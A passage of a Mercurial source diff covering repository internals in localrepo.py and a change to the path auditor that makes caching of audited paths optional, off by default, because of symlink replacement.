1964 parent2=xp2)
1964 # set the new commit is proper phase
1965 # set the new commit is proper phase
1965 targetphase = subrepo.newcommitphase(self.ui, ctx)
1966 targetphase = subrepo.newcommitphase(self.ui, ctx)
1966 if targetphase:
1967 if targetphase:
1967 # retract boundary do not alter parent changeset.
1968 # retract boundary do not alter parent changeset.
1968 # if a parent have higher the resulting phase will
1969 # if a parent have higher the resulting phase will
1969 # be compliant anyway
1970 # be compliant anyway
1970 #
1971 #
1971 # if minimal phase was 0 we don't need to retract anything
1972 # if minimal phase was 0 we don't need to retract anything
1972 phases.registernew(self, tr, targetphase, [n])
1973 phases.registernew(self, tr, targetphase, [n])
1973 tr.close()
1974 tr.close()
1974 return n
1975 return n
1975 finally:
1976 finally:
1976 if tr:
1977 if tr:
1977 tr.release()
1978 tr.release()
1978 lock.release()
1979 lock.release()
1979
1980
1980 @unfilteredmethod
1981 @unfilteredmethod
1981 def destroying(self):
1982 def destroying(self):
1982 '''Inform the repository that nodes are about to be destroyed.
1983 '''Inform the repository that nodes are about to be destroyed.
1983 Intended for use by strip and rollback, so there's a common
1984 Intended for use by strip and rollback, so there's a common
1984 place for anything that has to be done before destroying history.
1985 place for anything that has to be done before destroying history.
1985
1986
1986 This is mostly useful for saving state that is in memory and waiting
1987 This is mostly useful for saving state that is in memory and waiting
1987 to be flushed when the current lock is released. Because a call to
1988 to be flushed when the current lock is released. Because a call to
1988 destroyed is imminent, the repo will be invalidated causing those
1989 destroyed is imminent, the repo will be invalidated causing those
1989 changes to stay in memory (waiting for the next unlock), or vanish
1990 changes to stay in memory (waiting for the next unlock), or vanish
1990 completely.
1991 completely.
1991 '''
1992 '''
1992 # When using the same lock to commit and strip, the phasecache is left
1993 # When using the same lock to commit and strip, the phasecache is left
1993 # dirty after committing. Then when we strip, the repo is invalidated,
1994 # dirty after committing. Then when we strip, the repo is invalidated,
1994 # causing those changes to disappear.
1995 # causing those changes to disappear.
1995 if '_phasecache' in vars(self):
1996 if '_phasecache' in vars(self):
1996 self._phasecache.write()
1997 self._phasecache.write()
1997
1998
1998 @unfilteredmethod
1999 @unfilteredmethod
1999 def destroyed(self):
2000 def destroyed(self):
2000 '''Inform the repository that nodes have been destroyed.
2001 '''Inform the repository that nodes have been destroyed.
2001 Intended for use by strip and rollback, so there's a common
2002 Intended for use by strip and rollback, so there's a common
2002 place for anything that has to be done after destroying history.
2003 place for anything that has to be done after destroying history.
2003 '''
2004 '''
2004 # When one tries to:
2005 # When one tries to:
2005 # 1) destroy nodes thus calling this method (e.g. strip)
2006 # 1) destroy nodes thus calling this method (e.g. strip)
2006 # 2) use phasecache somewhere (e.g. commit)
2007 # 2) use phasecache somewhere (e.g. commit)
2007 #
2008 #
2008 # then 2) will fail because the phasecache contains nodes that were
2009 # then 2) will fail because the phasecache contains nodes that were
2009 # removed. We can either remove phasecache from the filecache,
2010 # removed. We can either remove phasecache from the filecache,
2010 # causing it to reload next time it is accessed, or simply filter
2011 # causing it to reload next time it is accessed, or simply filter
2011 # the removed nodes now and write the updated cache.
2012 # the removed nodes now and write the updated cache.
2012 self._phasecache.filterunknown(self)
2013 self._phasecache.filterunknown(self)
2013 self._phasecache.write()
2014 self._phasecache.write()
2014
2015
2015 # refresh all repository caches
2016 # refresh all repository caches
2016 self.updatecaches()
2017 self.updatecaches()
2017
2018
2018 # Ensure the persistent tag cache is updated. Doing it now
2019 # Ensure the persistent tag cache is updated. Doing it now
2019 # means that the tag cache only has to worry about destroyed
2020 # means that the tag cache only has to worry about destroyed
2020 # heads immediately after a strip/rollback. That in turn
2021 # heads immediately after a strip/rollback. That in turn
2021 # guarantees that "cachetip == currenttip" (comparing both rev
2022 # guarantees that "cachetip == currenttip" (comparing both rev
2022 # and node) always means no nodes have been added or destroyed.
2023 # and node) always means no nodes have been added or destroyed.
2023
2024
2024 # XXX this is suboptimal when qrefresh'ing: we strip the current
2025 # XXX this is suboptimal when qrefresh'ing: we strip the current
2025 # head, refresh the tag cache, then immediately add a new head.
2026 # head, refresh the tag cache, then immediately add a new head.
2026 # But I think doing it this way is necessary for the "instant
2027 # But I think doing it this way is necessary for the "instant
2027 # tag cache retrieval" case to work.
2028 # tag cache retrieval" case to work.
2028 self.invalidate()
2029 self.invalidate()
2029
2030
2030 def walk(self, match, node=None):
2031 def walk(self, match, node=None):
2031 '''
2032 '''
2032 walk recursively through the directory tree or a given
2033 walk recursively through the directory tree or a given
2033 changeset, finding all files matched by the match
2034 changeset, finding all files matched by the match
2034 function
2035 function
2035 '''
2036 '''
2036 self.ui.deprecwarn('use repo[node].walk instead of repo.walk', '4.3')
2037 self.ui.deprecwarn('use repo[node].walk instead of repo.walk', '4.3')
2037 return self[node].walk(match)
2038 return self[node].walk(match)
2038
2039
2039 def status(self, node1='.', node2=None, match=None,
2040 def status(self, node1='.', node2=None, match=None,
2040 ignored=False, clean=False, unknown=False,
2041 ignored=False, clean=False, unknown=False,
2041 listsubrepos=False):
2042 listsubrepos=False):
2042 '''a convenience method that calls node1.status(node2)'''
2043 '''a convenience method that calls node1.status(node2)'''
2043 return self[node1].status(node2, match, ignored, clean, unknown,
2044 return self[node1].status(node2, match, ignored, clean, unknown,
2044 listsubrepos)
2045 listsubrepos)
2045
2046
2046 def addpostdsstatus(self, ps):
2047 def addpostdsstatus(self, ps):
2047 """Add a callback to run within the wlock, at the point at which status
2048 """Add a callback to run within the wlock, at the point at which status
2048 fixups happen.
2049 fixups happen.
2049
2050
2050 On status completion, callback(wctx, status) will be called with the
2051 On status completion, callback(wctx, status) will be called with the
2051 wlock held, unless the dirstate has changed from underneath or the wlock
2052 wlock held, unless the dirstate has changed from underneath or the wlock
2052 couldn't be grabbed.
2053 couldn't be grabbed.
2053
2054
2054 Callbacks should not capture and use a cached copy of the dirstate --
2055 Callbacks should not capture and use a cached copy of the dirstate --
2055 it might change in the meanwhile. Instead, they should access the
2056 it might change in the meanwhile. Instead, they should access the
2056 dirstate via wctx.repo().dirstate.
2057 dirstate via wctx.repo().dirstate.
2057
2058
2058 This list is emptied out after each status run -- extensions should
2059 This list is emptied out after each status run -- extensions should
2059 make sure it adds to this list each time dirstate.status is called.
2060 make sure it adds to this list each time dirstate.status is called.
2060 Extensions should also make sure they don't call this for statuses
2061 Extensions should also make sure they don't call this for statuses
2061 that don't involve the dirstate.
2062 that don't involve the dirstate.
2062 """
2063 """
2063
2064
2064 # The list is located here for uniqueness reasons -- it is actually
2065 # The list is located here for uniqueness reasons -- it is actually
2065 # managed by the workingctx, but that isn't unique per-repo.
2066 # managed by the workingctx, but that isn't unique per-repo.
2066 self._postdsstatus.append(ps)
2067 self._postdsstatus.append(ps)
2067
2068
2068 def postdsstatus(self):
2069 def postdsstatus(self):
2069 """Used by workingctx to get the list of post-dirstate-status hooks."""
2070 """Used by workingctx to get the list of post-dirstate-status hooks."""
2070 return self._postdsstatus
2071 return self._postdsstatus
2071
2072
2072 def clearpostdsstatus(self):
2073 def clearpostdsstatus(self):
2073 """Used by workingctx to clear post-dirstate-status hooks."""
2074 """Used by workingctx to clear post-dirstate-status hooks."""
2074 del self._postdsstatus[:]
2075 del self._postdsstatus[:]
2075
2076
2076 def heads(self, start=None):
2077 def heads(self, start=None):
2077 if start is None:
2078 if start is None:
2078 cl = self.changelog
2079 cl = self.changelog
2079 headrevs = reversed(cl.headrevs())
2080 headrevs = reversed(cl.headrevs())
2080 return [cl.node(rev) for rev in headrevs]
2081 return [cl.node(rev) for rev in headrevs]
2081
2082
2082 heads = self.changelog.heads(start)
2083 heads = self.changelog.heads(start)
2083 # sort the output in rev descending order
2084 # sort the output in rev descending order
2084 return sorted(heads, key=self.changelog.rev, reverse=True)
2085 return sorted(heads, key=self.changelog.rev, reverse=True)
2085
2086
2086 def branchheads(self, branch=None, start=None, closed=False):
2087 def branchheads(self, branch=None, start=None, closed=False):
2087 '''return a (possibly filtered) list of heads for the given branch
2088 '''return a (possibly filtered) list of heads for the given branch
2088
2089
2089 Heads are returned in topological order, from newest to oldest.
2090 Heads are returned in topological order, from newest to oldest.
2090 If branch is None, use the dirstate branch.
2091 If branch is None, use the dirstate branch.
2091 If start is not None, return only heads reachable from start.
2092 If start is not None, return only heads reachable from start.
2092 If closed is True, return heads that are marked as closed as well.
2093 If closed is True, return heads that are marked as closed as well.
2093 '''
2094 '''
2094 if branch is None:
2095 if branch is None:
2095 branch = self[None].branch()
2096 branch = self[None].branch()
2096 branches = self.branchmap()
2097 branches = self.branchmap()
2097 if branch not in branches:
2098 if branch not in branches:
2098 return []
2099 return []
2099 # the cache returns heads ordered lowest to highest
2100 # the cache returns heads ordered lowest to highest
2100 bheads = list(reversed(branches.branchheads(branch, closed=closed)))
2101 bheads = list(reversed(branches.branchheads(branch, closed=closed)))
2101 if start is not None:
2102 if start is not None:
2102 # filter out the heads that cannot be reached from startrev
2103 # filter out the heads that cannot be reached from startrev
2103 fbheads = set(self.changelog.nodesbetween([start], bheads)[2])
2104 fbheads = set(self.changelog.nodesbetween([start], bheads)[2])
2104 bheads = [h for h in bheads if h in fbheads]
2105 bheads = [h for h in bheads if h in fbheads]
2105 return bheads
2106 return bheads
2106
2107
2107 def branches(self, nodes):
2108 def branches(self, nodes):
2108 if not nodes:
2109 if not nodes:
2109 nodes = [self.changelog.tip()]
2110 nodes = [self.changelog.tip()]
2110 b = []
2111 b = []
2111 for n in nodes:
2112 for n in nodes:
2112 t = n
2113 t = n
2113 while True:
2114 while True:
2114 p = self.changelog.parents(n)
2115 p = self.changelog.parents(n)
2115 if p[1] != nullid or p[0] == nullid:
2116 if p[1] != nullid or p[0] == nullid:
2116 b.append((t, n, p[0], p[1]))
2117 b.append((t, n, p[0], p[1]))
2117 break
2118 break
2118 n = p[0]
2119 n = p[0]
2119 return b
2120 return b
2120
2121
2121 def between(self, pairs):
2122 def between(self, pairs):
2122 r = []
2123 r = []
2123
2124
2124 for top, bottom in pairs:
2125 for top, bottom in pairs:
2125 n, l, i = top, [], 0
2126 n, l, i = top, [], 0
2126 f = 1
2127 f = 1
2127
2128
2128 while n != bottom and n != nullid:
2129 while n != bottom and n != nullid:
2129 p = self.changelog.parents(n)[0]
2130 p = self.changelog.parents(n)[0]
2130 if i == f:
2131 if i == f:
2131 l.append(n)
2132 l.append(n)
2132 f = f * 2
2133 f = f * 2
2133 n = p
2134 n = p
2134 i += 1
2135 i += 1
2135
2136
2136 r.append(l)
2137 r.append(l)
2137
2138
2138 return r
2139 return r
2139
2140
2140 def checkpush(self, pushop):
2141 def checkpush(self, pushop):
2141 """Extensions can override this function if additional checks have
2142 """Extensions can override this function if additional checks have
2142 to be performed before pushing, or call it if they override push
2143 to be performed before pushing, or call it if they override push
2143 command.
2144 command.
2144 """
2145 """
2145 pass
2146 pass
2146
2147
2147 @unfilteredpropertycache
2148 @unfilteredpropertycache
2148 def prepushoutgoinghooks(self):
2149 def prepushoutgoinghooks(self):
2149 """Return util.hooks consists of a pushop with repo, remote, outgoing
2150 """Return util.hooks consists of a pushop with repo, remote, outgoing
2150 methods, which are called before pushing changesets.
2151 methods, which are called before pushing changesets.
2151 """
2152 """
2152 return util.hooks()
2153 return util.hooks()
2153
2154
2154 def pushkey(self, namespace, key, old, new):
2155 def pushkey(self, namespace, key, old, new):
2155 try:
2156 try:
2156 tr = self.currenttransaction()
2157 tr = self.currenttransaction()
2157 hookargs = {}
2158 hookargs = {}
2158 if tr is not None:
2159 if tr is not None:
2159 hookargs.update(tr.hookargs)
2160 hookargs.update(tr.hookargs)
2160 hookargs['namespace'] = namespace
2161 hookargs['namespace'] = namespace
2161 hookargs['key'] = key
2162 hookargs['key'] = key
2162 hookargs['old'] = old
2163 hookargs['old'] = old
2163 hookargs['new'] = new
2164 hookargs['new'] = new
2164 self.hook('prepushkey', throw=True, **hookargs)
2165 self.hook('prepushkey', throw=True, **hookargs)
2165 except error.HookAbort as exc:
2166 except error.HookAbort as exc:
2166 self.ui.write_err(_("pushkey-abort: %s\n") % exc)
2167 self.ui.write_err(_("pushkey-abort: %s\n") % exc)
2167 if exc.hint:
2168 if exc.hint:
2168 self.ui.write_err(_("(%s)\n") % exc.hint)
2169 self.ui.write_err(_("(%s)\n") % exc.hint)
2169 return False
2170 return False
2170 self.ui.debug('pushing key for "%s:%s"\n' % (namespace, key))
2171 self.ui.debug('pushing key for "%s:%s"\n' % (namespace, key))
2171 ret = pushkey.push(self, namespace, key, old, new)
2172 ret = pushkey.push(self, namespace, key, old, new)
2172 def runhook():
2173 def runhook():
2173 self.hook('pushkey', namespace=namespace, key=key, old=old, new=new,
2174 self.hook('pushkey', namespace=namespace, key=key, old=old, new=new,
2174 ret=ret)
2175 ret=ret)
2175 self._afterlock(runhook)
2176 self._afterlock(runhook)
2176 return ret
2177 return ret
2177
2178
2178 def listkeys(self, namespace):
2179 def listkeys(self, namespace):
2179 self.hook('prelistkeys', throw=True, namespace=namespace)
2180 self.hook('prelistkeys', throw=True, namespace=namespace)
2180 self.ui.debug('listing keys for "%s"\n' % namespace)
2181 self.ui.debug('listing keys for "%s"\n' % namespace)
2181 values = pushkey.list(self, namespace)
2182 values = pushkey.list(self, namespace)
2182 self.hook('listkeys', namespace=namespace, values=values)
2183 self.hook('listkeys', namespace=namespace, values=values)
2183 return values
2184 return values
2184
2185
2185 def debugwireargs(self, one, two, three=None, four=None, five=None):
2186 def debugwireargs(self, one, two, three=None, four=None, five=None):
2186 '''used to test argument passing over the wire'''
2187 '''used to test argument passing over the wire'''
2187 return "%s %s %s %s %s" % (one, two, three, four, five)
2188 return "%s %s %s %s %s" % (one, two, three, four, five)
2188
2189
2189 def savecommitmessage(self, text):
2190 def savecommitmessage(self, text):
2190 fp = self.vfs('last-message.txt', 'wb')
2191 fp = self.vfs('last-message.txt', 'wb')
2191 try:
2192 try:
2192 fp.write(text)
2193 fp.write(text)
2193 finally:
2194 finally:
2194 fp.close()
2195 fp.close()
2195 return self.pathto(fp.name[len(self.root) + 1:])
2196 return self.pathto(fp.name[len(self.root) + 1:])
2196
2197
2197 # used to avoid circular references so destructors work
2198 # used to avoid circular references so destructors work
2198 def aftertrans(files):
2199 def aftertrans(files):
2199 renamefiles = [tuple(t) for t in files]
2200 renamefiles = [tuple(t) for t in files]
2200 def a():
2201 def a():
2201 for vfs, src, dest in renamefiles:
2202 for vfs, src, dest in renamefiles:
2202 # if src and dest refer to a same file, vfs.rename is a no-op,
2203 # if src and dest refer to a same file, vfs.rename is a no-op,
2203 # leaving both src and dest on disk. delete dest to make sure
2204 # leaving both src and dest on disk. delete dest to make sure
2204 # the rename couldn't be such a no-op.
2205 # the rename couldn't be such a no-op.
2205 vfs.tryunlink(dest)
2206 vfs.tryunlink(dest)
2206 try:
2207 try:
2207 vfs.rename(src, dest)
2208 vfs.rename(src, dest)
2208 except OSError: # journal file does not yet exist
2209 except OSError: # journal file does not yet exist
2209 pass
2210 pass
2210 return a
2211 return a
2211
2212
2212 def undoname(fn):
2213 def undoname(fn):
2213 base, name = os.path.split(fn)
2214 base, name = os.path.split(fn)
2214 assert name.startswith('journal')
2215 assert name.startswith('journal')
2215 return os.path.join(base, name.replace('journal', 'undo', 1))
2216 return os.path.join(base, name.replace('journal', 'undo', 1))
2216
2217
2217 def instance(ui, path, create):
2218 def instance(ui, path, create):
2218 return localrepository(ui, util.urllocalpath(path), create)
2219 return localrepository(ui, util.urllocalpath(path), create)
2219
2220
2220 def islocal(path):
2221 def islocal(path):
2221 return True
2222 return True
2222
2223
2223 def newreporequirements(repo):
2224 def newreporequirements(repo):
2224 """Determine the set of requirements for a new local repository.
2225 """Determine the set of requirements for a new local repository.
2225
2226
2226 Extensions can wrap this function to specify custom requirements for
2227 Extensions can wrap this function to specify custom requirements for
2227 new repositories.
2228 new repositories.
2228 """
2229 """
2229 ui = repo.ui
2230 ui = repo.ui
2230 requirements = {'revlogv1'}
2231 requirements = {'revlogv1'}
2231 if ui.configbool('format', 'usestore'):
2232 if ui.configbool('format', 'usestore'):
2232 requirements.add('store')
2233 requirements.add('store')
2233 if ui.configbool('format', 'usefncache'):
2234 if ui.configbool('format', 'usefncache'):
2234 requirements.add('fncache')
2235 requirements.add('fncache')
2235 if ui.configbool('format', 'dotencode'):
2236 if ui.configbool('format', 'dotencode'):
2236 requirements.add('dotencode')
2237 requirements.add('dotencode')
2237
2238
2238 compengine = ui.config('experimental', 'format.compression')
2239 compengine = ui.config('experimental', 'format.compression')
2239 if compengine not in util.compengines:
2240 if compengine not in util.compengines:
2240 raise error.Abort(_('compression engine %s defined by '
2241 raise error.Abort(_('compression engine %s defined by '
2241 'experimental.format.compression not available') %
2242 'experimental.format.compression not available') %
2242 compengine,
2243 compengine,
2243 hint=_('run "hg debuginstall" to list available '
2244 hint=_('run "hg debuginstall" to list available '
2244 'compression engines'))
2245 'compression engines'))
2245
2246
2246 # zlib is the historical default and doesn't need an explicit requirement.
2247 # zlib is the historical default and doesn't need an explicit requirement.
2247 if compengine != 'zlib':
2248 if compengine != 'zlib':
2248 requirements.add('exp-compression-%s' % compengine)
2249 requirements.add('exp-compression-%s' % compengine)
2249
2250
2250 if scmutil.gdinitconfig(ui):
2251 if scmutil.gdinitconfig(ui):
2251 requirements.add('generaldelta')
2252 requirements.add('generaldelta')
2252 if ui.configbool('experimental', 'treemanifest'):
2253 if ui.configbool('experimental', 'treemanifest'):
2253 requirements.add('treemanifest')
2254 requirements.add('treemanifest')
2254 if ui.configbool('experimental', 'manifestv2'):
2255 if ui.configbool('experimental', 'manifestv2'):
2255 requirements.add('manifestv2')
2256 requirements.add('manifestv2')
2256
2257
2257 revlogv2 = ui.config('experimental', 'revlogv2')
2258 revlogv2 = ui.config('experimental', 'revlogv2')
2258 if revlogv2 == 'enable-unstable-format-and-corrupt-my-data':
2259 if revlogv2 == 'enable-unstable-format-and-corrupt-my-data':
2259 requirements.remove('revlogv1')
2260 requirements.remove('revlogv1')
2260 # generaldelta is implied by revlogv2.
2261 # generaldelta is implied by revlogv2.
2261 requirements.discard('generaldelta')
2262 requirements.discard('generaldelta')
2262 requirements.add(REVLOGV2_REQUIREMENT)
2263 requirements.add(REVLOGV2_REQUIREMENT)
2263
2264
2264 return requirements
2265 return requirements
@@ -1,215 +1,221 b''
1 from __future__ import absolute_import
1 from __future__ import absolute_import
2
2
3 import errno
3 import errno
4 import os
4 import os
5 import posixpath
5 import posixpath
6 import stat
6 import stat
7
7
8 from .i18n import _
8 from .i18n import _
9 from . import (
9 from . import (
10 encoding,
10 encoding,
11 error,
11 error,
12 pycompat,
12 pycompat,
13 util,
13 util,
14 )
14 )
15
15
16 def _lowerclean(s):
16 def _lowerclean(s):
17 return encoding.hfsignoreclean(s.lower())
17 return encoding.hfsignoreclean(s.lower())
18
18
19 class pathauditor(object):
19 class pathauditor(object):
20 '''ensure that a filesystem path contains no banned components.
20 '''ensure that a filesystem path contains no banned components.
21 the following properties of a path are checked:
21 the following properties of a path are checked:
22
22
23 - ends with a directory separator
23 - ends with a directory separator
24 - under top-level .hg
24 - under top-level .hg
25 - starts at the root of a windows drive
25 - starts at the root of a windows drive
26 - contains ".."
26 - contains ".."
27
27
28 More check are also done about the file system states:
28 More check are also done about the file system states:
29 - traverses a symlink (e.g. a/symlink_here/b)
29 - traverses a symlink (e.g. a/symlink_here/b)
30 - inside a nested repository (a callback can be used to approve
30 - inside a nested repository (a callback can be used to approve
31 some nested repositories, e.g., subrepositories)
31 some nested repositories, e.g., subrepositories)
32
32
33 The file system checks are only done when 'realfs' is set to True (the
33 The file system checks are only done when 'realfs' is set to True (the
34 default). They should be disable then we are auditing path for operation on
34 default). They should be disable then we are auditing path for operation on
35 stored history.
35 stored history.
36
37 If 'cached' is set to True, audited paths and sub-directories are cached.
38 Be careful to not keep the cache of unmanaged directories for long because
39 audited paths may be replaced with symlinks.
36 '''
40 '''
37
41
38 def __init__(self, root, callback=None, realfs=True):
42 def __init__(self, root, callback=None, realfs=True, cached=False):
39 self.audited = set()
43 self.audited = set()
40 self.auditeddir = set()
44 self.auditeddir = set()
41 self.root = root
45 self.root = root
42 self._realfs = realfs
46 self._realfs = realfs
47 self._cached = cached
43 self.callback = callback
48 self.callback = callback
44 if os.path.lexists(root) and not util.fscasesensitive(root):
49 if os.path.lexists(root) and not util.fscasesensitive(root):
45 self.normcase = util.normcase
50 self.normcase = util.normcase
46 else:
51 else:
47 self.normcase = lambda x: x
52 self.normcase = lambda x: x
48
53
49 def __call__(self, path, mode=None):
54 def __call__(self, path, mode=None):
50 '''Check the relative path.
55 '''Check the relative path.
51 path may contain a pattern (e.g. foodir/**.txt)'''
56 path may contain a pattern (e.g. foodir/**.txt)'''
52
57
53 path = util.localpath(path)
58 path = util.localpath(path)
54 normpath = self.normcase(path)
59 normpath = self.normcase(path)
55 if normpath in self.audited:
60 if normpath in self.audited:
56 return
61 return
57 # AIX ignores "/" at end of path, others raise EISDIR.
62 # AIX ignores "/" at end of path, others raise EISDIR.
58 if util.endswithsep(path):
63 if util.endswithsep(path):
59 raise error.Abort(_("path ends in directory separator: %s") % path)
64 raise error.Abort(_("path ends in directory separator: %s") % path)
60 parts = util.splitpath(path)
65 parts = util.splitpath(path)
61 if (os.path.splitdrive(path)[0]
66 if (os.path.splitdrive(path)[0]
62 or _lowerclean(parts[0]) in ('.hg', '.hg.', '')
67 or _lowerclean(parts[0]) in ('.hg', '.hg.', '')
63 or os.pardir in parts):
68 or os.pardir in parts):
64 raise error.Abort(_("path contains illegal component: %s") % path)
69 raise error.Abort(_("path contains illegal component: %s") % path)
65 # Windows shortname aliases
70 # Windows shortname aliases
66 for p in parts:
71 for p in parts:
67 if "~" in p:
72 if "~" in p:
68 first, last = p.split("~", 1)
73 first, last = p.split("~", 1)
69 if last.isdigit() and first.upper() in ["HG", "HG8B6C"]:
74 if last.isdigit() and first.upper() in ["HG", "HG8B6C"]:
70 raise error.Abort(_("path contains illegal component: %s")
75 raise error.Abort(_("path contains illegal component: %s")
71 % path)
76 % path)
72 if '.hg' in _lowerclean(path):
77 if '.hg' in _lowerclean(path):
73 lparts = [_lowerclean(p.lower()) for p in parts]
78 lparts = [_lowerclean(p.lower()) for p in parts]
74 for p in '.hg', '.hg.':
79 for p in '.hg', '.hg.':
75 if p in lparts[1:]:
80 if p in lparts[1:]:
76 pos = lparts.index(p)
81 pos = lparts.index(p)
77 base = os.path.join(*parts[:pos])
82 base = os.path.join(*parts[:pos])
78 raise error.Abort(_("path '%s' is inside nested repo %r")
83 raise error.Abort(_("path '%s' is inside nested repo %r")
79 % (path, base))
84 % (path, base))
80
85
81 normparts = util.splitpath(normpath)
86 normparts = util.splitpath(normpath)
82 assert len(parts) == len(normparts)
87 assert len(parts) == len(normparts)
83
88
84 parts.pop()
89 parts.pop()
85 normparts.pop()
90 normparts.pop()
86 prefixes = []
91 prefixes = []
87 # It's important that we check the path parts starting from the root.
92 # It's important that we check the path parts starting from the root.
88 # This means we won't accidentally traverse a symlink into some other
93 # This means we won't accidentally traverse a symlink into some other
89 # filesystem (which is potentially expensive to access).
94 # filesystem (which is potentially expensive to access).
90 for i in range(len(parts)):
95 for i in range(len(parts)):
91 prefix = pycompat.ossep.join(parts[:i + 1])
96 prefix = pycompat.ossep.join(parts[:i + 1])
92 normprefix = pycompat.ossep.join(normparts[:i + 1])
97 normprefix = pycompat.ossep.join(normparts[:i + 1])
93 if normprefix in self.auditeddir:
98 if normprefix in self.auditeddir:
94 continue
99 continue
95 if self._realfs:
100 if self._realfs:
96 self._checkfs(prefix, path)
101 self._checkfs(prefix, path)
97 prefixes.append(normprefix)
102 prefixes.append(normprefix)
98
103
99 self.audited.add(normpath)
104 if self._cached:
100 # only add prefixes to the cache after checking everything: we don't
105 self.audited.add(normpath)
101 # want to add "foo/bar/baz" before checking if there's a "foo/.hg"
106 # only add prefixes to the cache after checking everything: we don't
102 self.auditeddir.update(prefixes)
107 # want to add "foo/bar/baz" before checking if there's a "foo/.hg"
108 self.auditeddir.update(prefixes)
103
109
104 def _checkfs(self, prefix, path):
110 def _checkfs(self, prefix, path):
105 """raise exception if a file system backed check fails"""
111 """raise exception if a file system backed check fails"""
106 curpath = os.path.join(self.root, prefix)
112 curpath = os.path.join(self.root, prefix)
107 try:
113 try:
108 st = os.lstat(curpath)
114 st = os.lstat(curpath)
109 except OSError as err:
115 except OSError as err:
110 # EINVAL can be raised as invalid path syntax under win32.
116 # EINVAL can be raised as invalid path syntax under win32.
111 # They must be ignored for patterns can be checked too.
117 # They must be ignored for patterns can be checked too.
112 if err.errno not in (errno.ENOENT, errno.ENOTDIR, errno.EINVAL):
118 if err.errno not in (errno.ENOENT, errno.ENOTDIR, errno.EINVAL):
113 raise
119 raise
114 else:
120 else:
115 if stat.S_ISLNK(st.st_mode):
121 if stat.S_ISLNK(st.st_mode):
116 msg = _('path %r traverses symbolic link %r') % (path, prefix)
122 msg = _('path %r traverses symbolic link %r') % (path, prefix)
117 raise error.Abort(msg)
123 raise error.Abort(msg)
118 elif (stat.S_ISDIR(st.st_mode) and
124 elif (stat.S_ISDIR(st.st_mode) and
119 os.path.isdir(os.path.join(curpath, '.hg'))):
125 os.path.isdir(os.path.join(curpath, '.hg'))):
120 if not self.callback or not self.callback(curpath):
126 if not self.callback or not self.callback(curpath):
121 msg = _("path '%s' is inside nested repo %r")
127 msg = _("path '%s' is inside nested repo %r")
122 raise error.Abort(msg % (path, prefix))
128 raise error.Abort(msg % (path, prefix))
123
129
124 def check(self, path):
130 def check(self, path):
125 try:
131 try:
126 self(path)
132 self(path)
127 return True
133 return True
128 except (OSError, error.Abort):
134 except (OSError, error.Abort):
129 return False
135 return False
130
136
131 def canonpath(root, cwd, myname, auditor=None):
137 def canonpath(root, cwd, myname, auditor=None):
132 '''return the canonical path of myname, given cwd and root'''
138 '''return the canonical path of myname, given cwd and root'''
133 if util.endswithsep(root):
139 if util.endswithsep(root):
134 rootsep = root
140 rootsep = root
135 else:
141 else:
136 rootsep = root + pycompat.ossep
142 rootsep = root + pycompat.ossep
137 name = myname
143 name = myname
138 if not os.path.isabs(name):
144 if not os.path.isabs(name):
139 name = os.path.join(root, cwd, name)
145 name = os.path.join(root, cwd, name)
140 name = os.path.normpath(name)
146 name = os.path.normpath(name)
141 if auditor is None:
147 if auditor is None:
142 auditor = pathauditor(root)
148 auditor = pathauditor(root)
143 if name != rootsep and name.startswith(rootsep):
149 if name != rootsep and name.startswith(rootsep):
144 name = name[len(rootsep):]
150 name = name[len(rootsep):]
145 auditor(name)
151 auditor(name)
146 return util.pconvert(name)
152 return util.pconvert(name)
147 elif name == root:
153 elif name == root:
148 return ''
154 return ''
149 else:
155 else:
150 # Determine whether `name' is in the hierarchy at or beneath `root',
156 # Determine whether `name' is in the hierarchy at or beneath `root',
151 # by iterating name=dirname(name) until that causes no change (can't
157 # by iterating name=dirname(name) until that causes no change (can't
152 # check name == '/', because that doesn't work on windows). The list
158 # check name == '/', because that doesn't work on windows). The list
153 # `rel' holds the reversed list of components making up the relative
159 # `rel' holds the reversed list of components making up the relative
154 # file name we want.
160 # file name we want.
155 rel = []
161 rel = []
156 while True:
162 while True:
157 try:
163 try:
158 s = util.samefile(name, root)
164 s = util.samefile(name, root)
159 except OSError:
165 except OSError:
160 s = False
166 s = False
161 if s:
167 if s:
162 if not rel:
168 if not rel:
163 # name was actually the same as root (maybe a symlink)
169 # name was actually the same as root (maybe a symlink)
164 return ''
170 return ''
165 rel.reverse()
171 rel.reverse()
166 name = os.path.join(*rel)
172 name = os.path.join(*rel)
167 auditor(name)
173 auditor(name)
168 return util.pconvert(name)
174 return util.pconvert(name)
169 dirname, basename = util.split(name)
175 dirname, basename = util.split(name)
170 rel.append(basename)
176 rel.append(basename)
171 if dirname == name:
177 if dirname == name:
172 break
178 break
173 name = dirname
179 name = dirname
174
180
175 # A common mistake is to use -R, but specify a file relative to the repo
181 # A common mistake is to use -R, but specify a file relative to the repo
176 # instead of cwd. Detect that case, and provide a hint to the user.
182 # instead of cwd. Detect that case, and provide a hint to the user.
177 hint = None
183 hint = None
178 try:
184 try:
179 if cwd != root:
185 if cwd != root:
180 canonpath(root, root, myname, auditor)
186 canonpath(root, root, myname, auditor)
181 hint = (_("consider using '--cwd %s'")
187 hint = (_("consider using '--cwd %s'")
182 % os.path.relpath(root, cwd))
188 % os.path.relpath(root, cwd))
183 except error.Abort:
189 except error.Abort:
184 pass
190 pass
185
191
186 raise error.Abort(_("%s not under root '%s'") % (myname, root),
192 raise error.Abort(_("%s not under root '%s'") % (myname, root),
187 hint=hint)
193 hint=hint)
188
194
189 def normasprefix(path):
195 def normasprefix(path):
190 '''normalize the specified path as path prefix
196 '''normalize the specified path as path prefix
191
197
192 Returned value can be used safely for "p.startswith(prefix)",
198 Returned value can be used safely for "p.startswith(prefix)",
193 "p[len(prefix):]", and so on.
199 "p[len(prefix):]", and so on.
194
200
195 For efficiency, this expects "path" argument to be already
201 For efficiency, this expects "path" argument to be already
196 normalized by "os.path.normpath", "os.path.realpath", and so on.
202 normalized by "os.path.normpath", "os.path.realpath", and so on.
197
203
198 See also issue3033 for detail about need of this function.
204 See also issue3033 for detail about need of this function.
199
205
200 >>> normasprefix('/foo/bar').replace(os.sep, '/')
206 >>> normasprefix('/foo/bar').replace(os.sep, '/')
201 '/foo/bar/'
207 '/foo/bar/'
202 >>> normasprefix('/').replace(os.sep, '/')
208 >>> normasprefix('/').replace(os.sep, '/')
203 '/'
209 '/'
204 '''
210 '''
205 d, p = os.path.splitdrive(path)
211 d, p = os.path.splitdrive(path)
206 if len(p) != len(pycompat.ossep):
212 if len(p) != len(pycompat.ossep):
207 return path + pycompat.ossep
213 return path + pycompat.ossep
208 else:
214 else:
209 return path
215 return path
210
216
211 # forward two methods from posixpath that do what we need, but we'd
